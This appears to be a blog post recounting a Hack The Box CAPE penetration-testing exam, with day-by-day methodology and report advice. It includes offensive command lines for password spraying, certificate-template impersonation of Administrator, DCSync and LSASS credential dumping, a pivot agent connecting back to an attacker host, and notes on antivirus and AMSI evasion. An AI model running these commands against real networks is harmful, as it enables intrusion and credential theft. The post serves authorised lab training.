HTB CAPE Exam Experience — Full Walkthrough

lazyhackers
Apr 4, 2026 · 15 min read · 10 views
HTB CAPE Exam Experience — Full Walkthrough

HTB CAPE Exam — Real Exam Experience & Walkthrough

I recently sat for the Hack The Box Certified Attack Penetration Expert (HTB CAPE) exam — one of the hardest hands-on offensive security certifications out there. This isn't a generic "how to prepare" guide. This is my actual exam experience — what the environment looked like, how I approached it, where I got stuck, what worked, and what I'd do differently.

If you're planning to attempt CAPE, this is the closest thing to a spoiler-free walkthrough you'll find.

Disclaimer: I won't be sharing exact exam flags, machine names, or specific vulnerabilities from the exam. That violates HTB's exam policy. But I will share my methodology, the types of challenges I faced, and exactly how I approached the 10-day exam window.

Exam Overview — What You're Walking Into

DetailInfo
Duration10 days total (exploitation + report)
EnvironmentFull simulated corporate Active Directory network
Network SegmentsMultiple subnets — you must pivot through them
MachinesMultiple hosts (Windows + Linux) across different segments
GoalCompromise the entire AD environment — collect flags along the way
ReportProfessional pentest report required — it's a significant part of your grade
ConnectionOpenVPN into the exam lab
ProctoringNo live proctor — honor-based with validation checks
RevertYou can revert machines if something breaks

The exam is designed to simulate a real enterprise penetration test engagement. You start from an external attacker perspective and must work your way through the entire network to achieve domain dominance. It's not a collection of standalone boxes — everything is interconnected, and you need to chain attacks across machines and network segments.

My Background Going In

Before attempting CAPE, I had:

  • HTB CPTS — passed on first attempt
  • OSCP — passed
  • CRTP & CRTE — both cleared
  • Completed HTB Pro Labs: Offshore, RastaLabs, and Dante
  • 150+ HTB machines retired
  • ~2 years of active CTF/lab experience

And I'll be honest — CAPE was still the hardest exam I've ever taken. It's a massive step up from CPTS.

Day 0 — Pre-Exam Setup (The Night Before)

Preparation isn't just about knowledge. Your tooling and workflow need to be dialed in before the clock starts.

My Setup

  • Attack VM: Kali Linux (latest rolling release, fully updated)
  • Note-Taking: Obsidian with a pre-made pentest template
  • Screenshots: Flameshot — bound to PrintScreen key, auto-saves to timestamped folders
  • Terminal: tmux with logging enabled via tmux-logging plugin
  • Reporting: SysReptor (HTB recommended) — had templates ready
  • Wordlists: SecLists, custom AD wordlists, seasonal password lists

Tools I Pre-Installed & Tested

# Core tools verified working before exam
impacket-scripts    # Full Impacket suite
crackmapexec        # (or netexec — latest)
bloodhound          # + SharpHound binaries (multiple versions)
evil-winrm
chisel              # Linux + Windows binaries
ligolo-ng           # proxy + agent binaries
certipy-ad          # AD CS attacks
feroxbuster
sshuttle
proxychains4
thrift-compiler     # Just in case

# Windows binaries staged
Rubeus.exe
SharpHound.exe
winPEAS.exe
Certify.exe
Seatbelt.exe
PowerView.ps1
Invoke-Mimikatz.ps1   # Multiple versions for AV bypass
nanodump (BOF)
PrintSpoofer.exe
GodPotato.exe

Network Diagram Template

I created a blank draw.io network diagram and kept it open throughout the exam, updating it as I discovered new subnets and hosts. This turned out to be critical — by day 4, the environment was complex enough that I'd have been lost without it.

# My folder structure
~/cape-exam/
├── notes/           # Obsidian vault
├── screenshots/     # Flameshot auto-save
├── loot/            # Creds, hashes, keys, tokens
├── scans/           # Nmap, BloodHound data
├── tools/           # Staged binaries
├── exploits/        # Custom scripts/exploits
├── logs/            # tmux terminal logs
└── report/          # SysReptor project

Day 1 — Reconnaissance Only (Don't Touch Anything)

My rule for day 1: Enumerate everything, exploit nothing.

This was the single best decision I made. The temptation to jump into exploiting the first thing you find is massive. Resist it.

What I Did

  1. Network sweep — identify all live hosts in the initial subnet
  2. Full port scan on every discovered host
  3. Service enumeration — banners, versions, technologies
  4. Web application enumeration — every HTTP/HTTPS service gets directory bruteforced, source code reviewed
  5. SMB/LDAP/DNS enumeration — null sessions, anonymous binds, zone transfers
  6. Network diagram — started mapping the topology
# My standard initial sweep
nmap -sn SUBNET/24 -oA discovery

# Full TCP scan on all discovered hosts
for ip in $(cat discovery.gnmap | grep "Up" | cut -d" " -f2); do
    nmap -sCV -p- -T4 --min-rate=1000 $ip -oA full-$ip &
done

# UDP quick check on common ports
nmap -sU --top-ports 20 -T4 SUBNET/24 -oA udp-quick

Key Lesson

By the end of day 1, I had a clear picture of the attack surface. I identified:

  • Multiple web applications across different hosts
  • Domain controllers and their versions
  • Several services that could be potential entry points
  • Network architecture (what's directly accessible vs what needs pivoting)

If I had started exploiting immediately, I would have tunnel-visioned on the first entry point and missed easier paths.

Day 2-3 — Initial Access & First Foothold

With recon complete, I prioritized targets based on what looked most promising.

The Approach

CAPE's initial access isn't going to be a simple "run an exploit and you're in." Expect to chain together multiple findings. My approach:

  1. Web apps first — these had the most attack surface
  2. Credential hunting — default creds, password spraying, cred stuffing from any leaks
  3. Known CVEs — check every service version against known vulnerabilities
  4. Misconfigurations — anonymous access, overly permissive shares, exposed admin panels

What I Encountered (Types, Not Specifics)

  • Web application vulnerabilities that required chaining to get code execution — not just "fire SQLMap and done"
  • Services with known CVEs that needed modification to work against the specific target version
  • Credentials found in unexpected places — config files, database entries, git repos
  • Some attacks required understanding the application logic, not just throwing payloads

Mistakes I Made

  • Spent 4 hours on a rabbit hole that turned out to be a dead end — should have moved on after 2 hours max
  • Forgot to check all virtual hosts on one web server — the real entry was on a vhost I discovered later
  • Tried to exploit a service before fully enumerating it — wasted time on the wrong attack vector

Rule of thumb: If you've been stuck on something for 2-3 hours with no progress, move on. Come back with fresh eyes later. The exam gives you 10 days for a reason.

Day 3-5 — Lateral Movement & Pivoting

Once I had my first foothold, the real exam began. The initial subnet was just the outer layer.

First Thing After Any Shell: BloodHound

Every single time I got new AD credentials, I ran BloodHound collection immediately:

# From Linux (remote collection)
bloodhound-python -c All -u 'user' -p 'password' -d DOMAIN -ns DC_IP --zip

# From Windows (on compromised host)
.\SharpHound.exe -c All --zipfilename loot.zip

Then I analyzed:

  • Shortest path from owned principals to high-value targets
  • Kerberoastable accounts
  • ACL abuse paths (GenericAll, WriteDACL, GenericWrite, etc.)
  • Computers where our user has admin rights
  • Group memberships that give access to new segments

Pivoting — The Backbone of CAPE

This is where CAPE separates itself from CPTS. You absolutely must be comfortable with multi-hop pivoting. I used a combination of:

  • Ligolo-ng — my primary pivoting tool. TUN interface makes it feel like you're directly on the internal network. Multi-hop support is excellent.
  • Chisel — backup for SOCKS proxying when Ligolo had issues
  • SSH tunneling — for specific port forwards when I had SSH access
  • proxychains4 — for routing tools through SOCKS proxies
# Ligolo-ng setup (what I used most)
# Attacker:
./proxy -selfcert -laddr 0.0.0.0:11601

# Compromised host:
./agent -connect ATTACKER:11601 -ignore-cert

# In ligolo console — add route for new subnet:
>> session
>> ifconfig
>> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:1234 --tcp
>> start --tun ligolo

At one point I had three layers of pivoting — my machine → first compromise → second segment → third segment. Keeping track of this without a network diagram would have been impossible.

Credential Reuse — Check Everything

Every password I found, I sprayed it across every service on every host:

# Spray creds across all known hosts
crackmapexec smb hosts.txt -u users.txt -p 'FoundPassword!' --continue-on-success
crackmapexec winrm hosts.txt -u users.txt -p 'FoundPassword!' --continue-on-success
crackmapexec ssh hosts.txt -u users.txt -p 'FoundPassword!' --continue-on-success

This found me multiple lateral movement paths I wouldn't have found otherwise. People reuse passwords — even in CTF environments designed to simulate real enterprises.

Day 5-7 — Active Directory Attacks & Domain Dominance

By this point I had access to multiple network segments and several compromised accounts. Now it was about chaining AD attacks to reach domain admin.

Types of AD Attacks I Encountered

Without giving away specifics, the exam tested my knowledge of:

  • Kerberos attacks — not just basic Kerberoasting. Think delegation attacks, ticket manipulation, cross-realm scenarios
  • ACL abuse — BloodHound paths that required multiple steps to exploit
  • AD CS (Certificate Services) — this was a significant part of the attack chain. If you don't know certipy and ESC1-ESC8, you're not ready
  • Trust relationships — understanding how domain trusts work and how to abuse them
  • Group Policy — GPO abuse, GPP passwords, LAPS
  • Credential harvesting — DPAPI, browser creds, vault, KeePass databases, config files

AD CS Was Critical

I cannot stress this enough — AD Certificate Services was a major attack vector. Make sure you can:

# Enumerate AD CS
certipy find -u user@domain -p 'password' -dc-ip DC_IP -vulnerable

# Common attack patterns:
# ESC1 — Enrollee supplies subject (impersonate anyone)
certipy req -u user@domain -p 'password' -ca CA-NAME -template VULN_TEMPLATE -upn Administrator@domain

# ESC4 — Vulnerable template ACL (modify template, then exploit)
certipy template -u user@domain -p 'password' -template VULN_TEMPLATE -save-old

# ESC8 — NTLM relay to AD CS HTTP endpoint
# Authenticate with obtained certificate
certipy auth -pfx admin.pfx -dc-ip DC_IP

When I Got Stuck (And How I Got Unstuck)

There was a point around day 5 where I hit a wall. I had compromised several machines but couldn't find the path forward. Here's what got me unstuck:

  1. Re-ran BloodHound with the newly compromised accounts — the attack graph changed completely
  2. Went back to enumeration — checked for new shares accessible with new creds
  3. Read EVERYTHING — config files, scripts, databases, email inboxes, desktop files. The next clue was in a file I'd overlooked
  4. Checked for stored credentials — DPAPI blobs, browser saved passwords, credential manager
  5. Took a break — went for a walk, came back, and immediately saw what I'd been missing

Pro Tip: When stuck, the answer is almost always more enumeration, not more exploitation. Check what new access your current credentials give you. Check files, shares, databases, applications. The path forward is often a piece of information, not a CVE.

Day 7 — AV/EDR Evasion

Some hosts in the environment had security controls active. This is where CAPE goes beyond CPTS territory.

What I Encountered

  • Windows Defender catching common tools (Mimikatz, Rubeus)
  • AMSI blocking PowerShell payloads
  • AppLocker/Constrained Language Mode on some hosts

What Worked

  • Living off the land — using built-in Windows tools (certutil, bitsadmin, net, nltest) wherever possible
  • AMSI bypass before running any PowerShell tooling — have multiple bypass techniques ready
  • Alternative tools — instead of Mimikatz, used lsassy (remote), pypykatz (offline), or nanodump (BOF)
  • Custom compiled tools — some tools I compiled from source with minor modifications to evade signature detection
  • Impacket from Linux — many attacks can be done remotely from your Kali box without dropping anything on the target
# Remote credential dumping (no need to touch disk)
lsassy -u admin -p 'password' -d domain TARGET_IP

# Remote Kerberoasting (from Kali)
GetUserSPNs.py domain/user:'password' -dc-ip DC_IP -outputfile hashes.txt

# Remote DCSync (from Kali)
secretsdump.py domain/user:'password'@DC_IP -just-dc-ntlm

Key lesson: The more you can do remotely from your Linux attack machine using Impacket, the less you need to worry about AV on the target.

Day 8 — Final Flags & Verification

By day 8 I had compromised the full domain. I spent this day:

  • Collecting any missed flags — re-checked every machine for user.txt/root.txt equivalents
  • Verifying attack chains — re-ran critical exploits to confirm they were repeatable and well-documented
  • Filling in screenshot gaps — went back and captured clean screenshots for any steps I'd rushed through
  • Organizing notes — structured all my raw notes into a coherent attack narrative

Critical: Do NOT leave screenshot capture for later. I had to re-exploit two machines just to get proper screenshots because I'd forgotten to capture them in the moment. Screenshot every command and every output as you go.

Day 9-10 — Report Writing

The report is a massive part of your grade. You can technically get all the flags and still fail if your report is garbage.

My Report Structure

  1. Executive Summary (1-2 pages)
    • High-level overview for a non-technical audience
    • Overall risk rating
    • Key findings and business impact
    • Strategic recommendations
  2. Scope & Methodology (1 page)
    • What was tested
    • Testing methodology (PTES, MITRE ATT&CK)
    • Tools used
  3. Attack Narrative (5-10 pages)
    • Complete attack chain from external to domain admin
    • Network diagram showing the path taken
    • Each pivot point documented
    • This tells the "story" of the engagement
  4. Detailed Technical Findings (bulk of the report)
    • Each vulnerability as a separate finding
    • Severity rating (CVSS 3.1)
    • Description of the vulnerability
    • Affected hosts/services
    • Step-by-step reproduction with screenshots
    • Evidence (command output, POC)
    • Business impact
    • Remediation recommendations (specific, actionable)
  5. Appendices
    • Full tool list
    • MITRE ATT&CK technique mapping
    • Compromised credentials table
    • Network diagram (final version)

Report Tips That Saved Me

  • Use SysReptor — it's what HTB recommends, and it generates clean, professional PDFs. I had the template ready before the exam started.
  • Write findings as you go — don't wait until day 9 to start. I wrote rough drafts of each finding immediately after exploiting it.
  • Every step needs a screenshot — every command, every output, every web request. If it's not screenshotted, it didn't happen.
  • Remediation must be specific — "patch your systems" is not acceptable. Say exactly what to patch, what to configure, what to disable.
  • Proof of concept should be reproducible — someone should be able to follow your steps and replicate the attack.

My final report was ~80 pages including screenshots and appendices.

What Made CAPE Harder Than CPTS

AspectCPTSCAPE
Environment SizeSmall-medium AD networkLarge enterprise with multiple segments
Pivoting Complexity1-2 hops3+ hops, multiple subnets
AV/EDRMinimal to noneActive defenses on critical hosts
Attack ChainingRelatively straightforward pathsComplex chains requiring multiple vulnerabilities
AD ComplexitySingle domain basicsMultiple domains, trusts, AD CS, delegation
Exam DurationShorter10 days (needed every day)
Report StandardsImportantCritical — more weight on professional quality
Prior KnowledgeHTB Academy modules sufficientNeed Pro Labs + real-world experience

Essential Skills That Got Me Through

1. Multi-Hop Pivoting

If you can't set up a triple pivot with Ligolo-ng or Chisel in your sleep, you're not ready. Practice this until it's muscle memory.

2. AD CS Exploitation

Learn ALL the ESC techniques (ESC1 through ESC11). certipy is your best friend. This was a massive part of my attack chain.

3. BloodHound Mastery

Not just running SharpHound and looking at the default queries. Learn to write custom Cypher queries, understand every edge type, and know how to exploit each ACL relationship.

4. Credential Harvesting

Every password, hash, ticket, certificate, and key you find is valuable. Spray everything everywhere. The path forward often isn't an exploit — it's a reused password.

5. Patience & Methodology

10 days sounds like a lot. It isn't. Stick to your methodology, document everything, and don't panic when you hit walls.

What I'd Do Differently

  • Start reporting from day 1 — I waited until day 8 to seriously start the report and it was stressful. Write as you go.
  • Better screenshot discipline — automate terminal logging from the start. Use script command for every session.
  • Spend more time on AD CS before the exam — I knew the basics but had to learn some advanced techniques mid-exam.
  • Take more breaks — I burned myself out on days 3-4 doing 14-hour sessions. Shorter, focused sessions with breaks are more productive.
  • Practice Ligolo-ng multi-hop more — had some issues setting up the third hop that cost me a few hours of troubleshooting.

Preparation Resources That Actually Helped

Must-Do HTB Pro Labs

LabWhyPriority
OffshoreClosest thing to the CAPE exam — full AD, multiple segments, trustsCritical
RastaLabsAV evasion focus, realistic Windows enterpriseCritical
ZephyrComplex AD attacks, delegation, trust abuseHigh
APTLabsAPT simulation, advanced techniquesHigh
DanteGood warm-up, multi-network pivotingMedium

HTB Academy Modules

  • Active Directory Enumeration & Attacks
  • Active Directory LDAP
  • Kerberos Attacks
  • Active Directory Trust Attacks
  • Active Directory Certificate Services (AD CS)
  • Pivoting, Tunneling & Port Forwarding
  • Windows Privilege Escalation
  • Linux Privilege Escalation
  • AV Evasion / Whitelist Bypass

External Resources

  • The Hacker Recipes (thehacker.recipes) — best AD attack reference
  • HackTricks — for quick technique lookups
  • SpecterOps BloodHound docs — understand every edge
  • ired.team notes — excellent red team reference
  • CRTE/CRTP course material — if you have access, review it

Toolkit Cheat Sheet — What I Actually Used

Used Daily

nmap                    # Scanning
crackmapexec / netexec  # AD enum, spraying, exec
bloodhound-python       # Remote AD collection
evil-winrm              # Windows shells
ligolo-ng               # Pivoting (primary)
certipy                 # AD CS attacks
Impacket suite          # Everything AD (secretsdump, getST, psexec, etc.)
proxychains4            # Routing through pivots
feroxbuster             # Web directory bruteforce

Used Frequently

chisel                  # Backup pivoting
lsassy                  # Remote credential dump
Rubeus.exe              # Kerberos on Windows
SharpHound.exe          # AD collection on Windows
sshuttle                # VPN over SSH
hashcat                 # Cracking hashes

Used Occasionally

PowerView.ps1           # AD enum from Windows
Certify.exe             # AD CS from Windows
nanodump                # LSASS dump (AV bypass)
ScareCrow               # Payload obfuscation
socat                   # Port forwarding edge cases

Final Verdict

HTB CAPE is the real deal. It's not a certification you study for in a weekend or pass by memorizing techniques. It tests whether you can actually function as a penetration tester in a realistic enterprise environment.

If you're coming from OSCP alone, you're probably not ready. If you've done CPTS + at least Offshore and RastaLabs Pro Labs, you have a fighting chance.

The certification carries weight because it's genuinely difficult. Passing it means you can:

  • Enumerate and map complex enterprise networks
  • Chain vulnerabilities across multiple hosts and network segments
  • Exploit Active Directory at an advanced level
  • Bypass security controls
  • Pivot through segmented networks
  • Write professional penetration test reports

Difficulty: 9/10
Value: 10/10
Would I recommend it: Absolutely — if you're ready

Reactions